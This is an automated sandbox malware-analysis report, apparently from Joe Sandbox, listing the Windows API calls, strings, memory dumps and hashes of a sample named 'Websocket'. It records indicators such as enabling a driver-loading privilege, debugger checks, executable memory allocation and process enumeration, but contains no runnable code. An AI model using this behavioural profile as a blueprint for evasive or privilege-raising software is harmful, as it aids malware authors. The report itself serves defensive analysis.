                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0040EC7E
                                    Strings
                                    • tGeKa2B%k9F<3!6T*a>U%*s(fc>&tKC@3cQGhibVLni4I3u>F, xrefs: 0040EC93
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: tGeKa2B%k9F<3!6T*a>U%*s(fc>&tKC@3cQGhibVLni4I3u>F
                                    • API String ID: 4275171209-1198268820
                                    • Opcode ID: 3b538efd8d0877daca6c9ed735cc7399334d432909fa35e9c6d7cd521d04529b
                                    • Instruction ID: 01d0f4e730c09718d0011088008fc3b8b73f4a900f8981e618274441f709c89d
                                    • Opcode Fuzzy Hash: 3b538efd8d0877daca6c9ed735cc7399334d432909fa35e9c6d7cd521d04529b
                                    • Instruction Fuzzy Hash: 9EF046B5A846203BF22157258C0AFAF7E68CB84B50F544528FE046A2C0D7B89A0182DE
                                    Function 00731D10 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_731000_Websocket.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 75a1b7a7a6438216b2186a6c390a153a86880d5073630250062985e5924fd960
                                    • Instruction ID: c2e5a26e3691d19ce010ec0e9767793a4364f0c0a84ba09c837aca7d76225502
                                    • Opcode Fuzzy Hash: 75a1b7a7a6438216b2186a6c390a153a86880d5073630250062985e5924fd960
                                    • Instruction Fuzzy Hash: 7A419774A10109AFEB04CF54C494BAAB7B2FB88314F64C199E8195F356C779EE82CB80
                                    Function 00616CD0 Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryW.KERNELBASE(00000000,?,33A6B453,00616F05,?,33A6B453,006168AC), ref: 00616D00
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: aeeb888ef0dc69756414754748205e5a0b49ecf6f37ee8a4fdc93afb2f94b495
                                    • Instruction ID: eb862305534769d921f1bac1307ecd5018e250b7f9702cb7f0b398ee91163df2
                                    • Opcode Fuzzy Hash: aeeb888ef0dc69756414754748205e5a0b49ecf6f37ee8a4fdc93afb2f94b495
                                    • Instruction Fuzzy Hash: 8E014F34B003504BC794AB79A851AEB36E7AFC460070C842FB506CB3A1EA34DD424B94
                                    Function 00619878 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 006198DB
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeFindFirstNotification
                                    • String ID:
                                    • API String ID: 1065410024-0
                                    • Opcode ID: 874f0bae95bec1eacc342eb46230d74d4bbd7d8ee1198fa0ef0d72ce5cd718d4
                                    • Instruction ID: ea092e2bf288304ba1f8e9a653069d6894e7ba570bca7b9fdc6ebc92381600af
                                    • Opcode Fuzzy Hash: 874f0bae95bec1eacc342eb46230d74d4bbd7d8ee1198fa0ef0d72ce5cd718d4
                                    • Instruction Fuzzy Hash: 68018630A0034597CBB8DB7558A6BEA32A7AB98740F1C4C1EF946C7360EB35CDC19766
                                    Function 00614BA8 Relevance: 1.5, APIs: 1, Instructions: 28processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00614C02
                                    • Process32FirstW.KERNEL32(?,0000022C), ref: 00614C60
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFirstProcess32SnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 2353314856-0
                                    • Opcode ID: 44ad3fc9c473b854154963280b1e704f359749fec1c3a65bab715e04b1f45a1f
                                    • Instruction ID: b76c77aef2f8355c55b1e7c5f4625b6008d818d886863aeeb348a7811734cb22
                                    • Opcode Fuzzy Hash: 44ad3fc9c473b854154963280b1e704f359749fec1c3a65bab715e04b1f45a1f
                                    • Instruction Fuzzy Hash: 04F09B7071525057D678667C588B7F912835745710F2C491AE555E73F0FE31DCC187D1
                                    Function 007327B0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_731000_Websocket.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 51878fb2a1c5fb1b7f3aa0b0adae3dc0b55a3c72d4b2339b61c58abb1e390c61
                                    • Instruction ID: 4124ca63550c8d03ab08021d43678982b5f26220f8300b8477ff51e15decb775
                                    • Opcode Fuzzy Hash: 51878fb2a1c5fb1b7f3aa0b0adae3dc0b55a3c72d4b2339b61c58abb1e390c61
                                    • Instruction Fuzzy Hash: 7DD09EB4D40208FFE748EFA4DA4AB5DBBB4EB04706F508165E90497281E7746B44CB56
                                    Function 00731820 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,?,?), ref: 0073182F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_731000_Websocket.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: edd2763ed153eaf6052808db2e01758c8a1b456fd169d7e3e9ac4fe4ebab5eab
                                    • Instruction ID: 6057d2d6f7e46738dfa9a77c2a25436fbfb7f671643b38d211c6f5ff6480ba0a
                                    • Opcode Fuzzy Hash: edd2763ed153eaf6052808db2e01758c8a1b456fd169d7e3e9ac4fe4ebab5eab
                                    • Instruction Fuzzy Hash: BFC04C7A11420CAB8B04DF98EC84DAB37ADBB8C611B04C508BA1D87200C634F9108BA5

                                    Non-executed Functions

                                    Function 0040E220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 0040E22E
                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040E23B
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 0040E24D
                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0040E28B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeLoadDriverPrivilege
                                    • API String ID: 2349140579-497486668
                                    • Opcode ID: cffa3139d4f1966d0e1b8d4b561fce07a712f7e5228b86654aafc6df663748c5
                                    • Instruction ID: 6ea790c7a31b1ba1ad77907437152988263291b3601ce40a83fb03ebe5ecb5a6
                                    • Opcode Fuzzy Hash: cffa3139d4f1966d0e1b8d4b561fce07a712f7e5228b86654aafc6df663748c5
                                    • Instruction Fuzzy Hash: D301DAB4548301AFD704DF50C999F9BBBE4AB8CB08F40891DF58A862A0E774E948CB56
                                    Function 004100FB Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0041212A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041213F
                                    • UnhandledExceptionFilter.KERNEL32(0041989C), ref: 0041214A
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00412166
                                    • TerminateProcess.KERNEL32(00000000), ref: 0041216D
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: 6f2c9a2ca4667ff0c482e712aad0c8141d9414460f1110707eeb279986343969
                                    • Instruction ID: b5dc470c48336d2cad9fc5f7ad5caf64c585ac90b15cfe1187e4ee1c5b5d9eed
                                    • Opcode Fuzzy Hash: 6f2c9a2ca4667ff0c482e712aad0c8141d9414460f1110707eeb279986343969
                                    • Instruction Fuzzy Hash: 8C21DBB4911204EFD700DF69EC896C63BB4BB6C315F50803AE90A87372E7B4598A8F1D
                                    Function 00612210 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: l
                                    • API String ID: 0-2517025534
                                    • Opcode ID: b540197c04a4096c67bc52c6181e49dc103387498643872b5df22096f0c2060f
                                    • Instruction ID: be33586da93aa639825344dfbc8d9ed1cfe7aa8acb0ac371483907cf1c7f3d96
                                    • Opcode Fuzzy Hash: b540197c04a4096c67bc52c6181e49dc103387498643872b5df22096f0c2060f
                                    • Instruction Fuzzy Hash: FE91F271A043128BDB14DF64D8A1BEEB7E3ABC8310F0C852EE855DB350DA30DE958B91
                                    Function 00611FA0 Relevance: .2, Instructions: 175COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b4cb4ceeb99b27d04d461981ad2b3cb14c0d59e97dd2a0673e1abda0e18c0aab
                                    • Instruction ID: c120410f2f6f8d4cc9434338543c044b4d6e306a8908c48be494f9ecc57c48b8
                                    • Opcode Fuzzy Hash: b4cb4ceeb99b27d04d461981ad2b3cb14c0d59e97dd2a0673e1abda0e18c0aab
                                    • Instruction Fuzzy Hash: F851F375600202ABDB24DF689C517EB36E3EB85340F1C852AFA05CF361DB35CD929786
                                    Function 00413A77 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004109B8), ref: 00413A7F
                                    • __mtterm.LIBCMT ref: 00413A8B
                                      • Part of subcall function 004137C4: DecodePointer.KERNEL32(00000006,00413BED,?,004109B8), ref: 004137D5
                                      • Part of subcall function 004137C4: TlsFree.KERNEL32(00000004,00413BED,?,004109B8), ref: 004137EF
                                      • Part of subcall function 004137C4: DeleteCriticalSection.KERNEL32(00000000,00000000,77385810,?,00413BED,?,004109B8), ref: 00414742
                                      • Part of subcall function 004137C4: _free.LIBCMT ref: 00414745
                                      • Part of subcall function 004137C4: DeleteCriticalSection.KERNEL32(00000004,77385810,?,00413BED,?,004109B8), ref: 0041476C
                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00413AA1
                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00413AAE
                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00413ABB
                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00413AC8
                                    • TlsAlloc.KERNEL32(?,004109B8), ref: 00413B18
                                    • TlsSetValue.KERNEL32(00000000,?,004109B8), ref: 00413B33
                                    • __init_pointers.LIBCMT ref: 00413B3D
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B4E
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B5B
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B68
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B75
                                    • DecodePointer.KERNEL32(00413948,?,004109B8), ref: 00413B96
                                    • __calloc_crt.LIBCMT ref: 00413BAB
                                    • DecodePointer.KERNEL32(00000000,?,004109B8), ref: 00413BC5
                                    • GetCurrentThreadId.KERNEL32 ref: 00413BD7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                    • API String ID: 3698121176-3819984048
                                    • Opcode ID: 7fa4eb56ef05f7034d1ff1bbb87a14009720894ebe7a7eebfb30a0a54c149666
                                    • Instruction ID: b88612f9e2fa8c258af8cfdc3785799afccaa31c7b0e2b814971bbd95b978274
                                    • Opcode Fuzzy Hash: 7fa4eb56ef05f7034d1ff1bbb87a14009720894ebe7a7eebfb30a0a54c149666
                                    • Instruction Fuzzy Hash: 9E31B370904215ABD710AFB9FD096E63FF0AB48765710843BE815D32B1E7799986CF8C
                                    Function 0040F7B0 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 190windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostQuitMessage.USER32(00000000), ref: 0040F8A1
                                    • ShowWindow.USER32(00000000,00000001), ref: 0040F8BA
                                    • SendMessageW.USER32(00000000,0000100C,000000FF,00000002), ref: 0040F901
                                    • wsprintfW.USER32 ref: 0040F92B
                                    • MessageBoxW.USER32(00000000,System process can't been terminated!,Windows Notification,00000000), ref: 0040F956
                                    • SendMessageW.USER32(00000000,0000100C,00000000,00000002), ref: 0040F96B
                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0040FA5F
                                    Strings
                                    • iPos=%d, xrefs: 0040F925
                                    • View My Processes, xrefs: 0040F9AC
                                    • Windows Notification, xrefs: 0040F94B, 0040F9F4
                                    • View All Processes, xrefs: 0040F991
                                    • The application name can't be found. Please make sure whether the name is right!, xrefs: 0040F9F9
                                    • System process can't been terminated!, xrefs: 0040F950
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: Message$SendWindow$PostProcQuitShowwsprintf
                                    • String ID: System process can't been terminated!$The application name can't be found. Please make sure whether the name is right!$View All Processes$View My Processes$Windows Notification$iPos=%d
                                    • API String ID: 4014529712-140908480
                                    • Opcode ID: 746f52bec132f143904a4d114beca3bddeb3b89a76c870e33d9bf59fe38b171c
                                    • Instruction ID: b9e1b8610fbedb75af30f79fd81a6c46aadfc3012c35c013c55d51da3f45cb0f
                                    • Opcode Fuzzy Hash: 746f52bec132f143904a4d114beca3bddeb3b89a76c870e33d9bf59fe38b171c
                                    • Instruction Fuzzy Hash: 8061E7B2610201FBD734AB64EC59BE733A4A788300F14893BE556B76D0E738AC4D8B5D
                                    Function 0040F510 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 155processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserNameW.ADVAPI32 ref: 0040F53E
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F548
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F58B
                                    • CloseHandle.KERNEL32(00000000), ref: 0040F5A2
                                      • Part of subcall function 0040E170: GetLastError.KERNEL32 ref: 0040E18D
                                      • Part of subcall function 0040E170: FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: CloseCreateErrorFirstFormatHandleLastMessageNameProcess32SnapshotToolhelp32User
                                    • String ID: $%d K$CreateToolhelp32Snapshot (of processes)$Process32First
                                    • API String ID: 3266005361-2221559773
                                    • Opcode ID: 5abc778807c62ae2baa570d19bc32579730fa3d8dd42b44df11fc9701d9f20bb
                                    • Instruction ID: 63f366d3fdf1a23c1a20b758398628cdb4654b08413e4f9ed28baa702ff12125
                                    • Opcode Fuzzy Hash: 5abc778807c62ae2baa570d19bc32579730fa3d8dd42b44df11fc9701d9f20bb
                                    • Instruction Fuzzy Hash: 6251B671504300ABD324AB64DC52FEB73E8EF84758F44493EF589922C1EB7C9948879B
                                    Function 0040E800 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 76windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: wsprintf$MessageSend
                                    • String ID: Description$Memory$Process ID$Process Name$User Name$d
                                    • API String ID: 12235790-2901759098
                                    • Opcode ID: e5dbcb87020978b1e542e2b3685ea65f06ad9b3c102300a686b14875117c4917
                                    • Instruction ID: 279726ffbfae14383190c6c753e1979e50f314c5c8a28d2d91e27df4f51d6de9
                                    • Opcode Fuzzy Hash: e5dbcb87020978b1e542e2b3685ea65f06ad9b3c102300a686b14875117c4917
                                    • Instruction Fuzzy Hash: 772161B1A48340AFC360CF65C895B9BBBE4EB89704F504D2FF08893240D7B99945CF9A
                                    Function 0040E2A0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 128COMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcessToken.ADVAPI32 ref: 0040E2D4
                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,0000012C,?), ref: 0040E2FF
                                    • CloseHandle.KERNEL32(?), ref: 0040E35E
                                    • wsprintfW.USER32 ref: 0040E3AE
                                    • wsprintfW.USER32 ref: 0040E3CD
                                    • wsprintfW.USER32 ref: 0040E3E4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: wsprintf$Token$CloseHandleInformationOpenProcess
                                    • String ID: %s %s$GetTokenInformation$LookupAccountSid$OpenProcessToken
                                    • API String ID: 2594950064-3173787032
                                    • Opcode ID: e7827d6f24756a15ea7fd67e0d12da55e7482696f9941f31bcf56fd5c500a86e
                                    • Instruction ID: affa38bc1eb5f0fd5749b03f1417e1fb464e194ef1bd6555a84b7e3c49497071
                                    • Opcode Fuzzy Hash: e7827d6f24756a15ea7fd67e0d12da55e7482696f9941f31bcf56fd5c500a86e
                                    • Instruction Fuzzy Hash: C741A371508301ABE720CF25C845BEB77E8ABC8744F044D2EF88993291E778A955CB9A
                                    Function 0040E4B0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 153COMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryFullProcessImageNameW.KERNEL32 ref: 0040E4F3
                                      • Part of subcall function 0040E170: GetLastError.KERNEL32 ref: 0040E18D
                                      • Part of subcall function 0040E170: FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0040E536
                                    • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 0040E577
                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,00000000,00000000), ref: 0040E594
                                    • wsprintfW.USER32 ref: 0040E5C3
                                    • VerQueryValueW.VERSION(00000000,?,?,?,?,?,00000000,00000000), ref: 0040E5DC
                                    • _wcsncpy.LIBCMT ref: 0040E652
                                    Strings
                                    • \VarFileInfo\Translation, xrefs: 0040E58E
                                    • \StringFileInfo\%04X%04X\FileDescription, xrefs: 0040E5BD
                                    • QueryFullProcessImageName, xrefs: 0040E4FD
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: Query$FileInfoValueVersion$ErrorFormatFullImageLastMessageNameProcessSize_wcsncpywsprintf
                                    • String ID: QueryFullProcessImageName$\StringFileInfo\%04X%04X\FileDescription$\VarFileInfo\Translation
                                    • API String ID: 3020331544-1601958718
                                    • Opcode ID: 717397a408e92381d84000f1c6290437c4a0c9b5022d2bdde5cfeda8ea2e2501
                                    • Instruction ID: eaa9ef88b69fa93d3b711ac30ff6fc1bf7e9ecaf4ef91606315cd00198441a56
                                    • Opcode Fuzzy Hash: 717397a408e92381d84000f1c6290437c4a0c9b5022d2bdde5cfeda8ea2e2501
                                    • Instruction Fuzzy Hash: F14119725043016BD324EB22DC45FBB73E8AF98744F444D3EF849922D1EA79D908C76A
                                    Function 007314A0 Relevance: 12.2, APIs: 8, Instructions: 171COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetLastError.KERNEL32(0000007F), ref: 007314DB
                                    • SetLastError.KERNEL32(0000007F), ref: 00731507
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_731000_Websocket.jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID:
                                    • API String ID: 1452528299-0
                                    • Opcode ID: 6051255709d8ca6d3922b332002d0c1d203b79309da4551420f05953e9b460f9
                                    • Instruction ID: a6be09bbfe6d2794f7106b34fe3899a7141aa4d1b6372e5dfe543d44d0a03cb6
                                    • Opcode Fuzzy Hash: 6051255709d8ca6d3922b332002d0c1d203b79309da4551420f05953e9b460f9
                                    • Instruction Fuzzy Hash: D7711974E00109EFEB08DF94C581BADB7B2FF88304F648198D516AB352D738AE81DB90
                                    Function 00619E20 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 337COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 00619F75
                                    • GetCurrentProcess.KERNEL32(00000000), ref: 00619F78
                                    • GetCurrentProcess.KERNEL32(00000000), ref: 00619F7B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
